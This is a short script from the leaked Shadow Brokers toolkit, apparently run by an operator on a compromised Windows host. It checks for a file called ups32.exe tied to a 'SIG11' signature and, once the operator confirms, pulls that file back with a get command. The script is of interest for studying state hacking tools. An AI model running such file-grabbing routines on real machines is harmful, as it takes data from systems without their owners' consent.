shadowbrokers-exploits/windows/Resources/Ep/Scripts/malfind/getsig11.eps
2017-04-14 11:45:07 +02:00

12 lines
No EOL
263 B
PostScript

string $syspath = GetEnv("SYSPATH");
string $f1 = "$syspath\\ups32.exe";
@record on;
`dir $f1`;
int $size_f1 = GetCmdData("size");
@record off;
if (prompt "SIG11 was detected. Do you want to grab the files? \n $f1, size: $size_f1)") {
`get $f1`;
}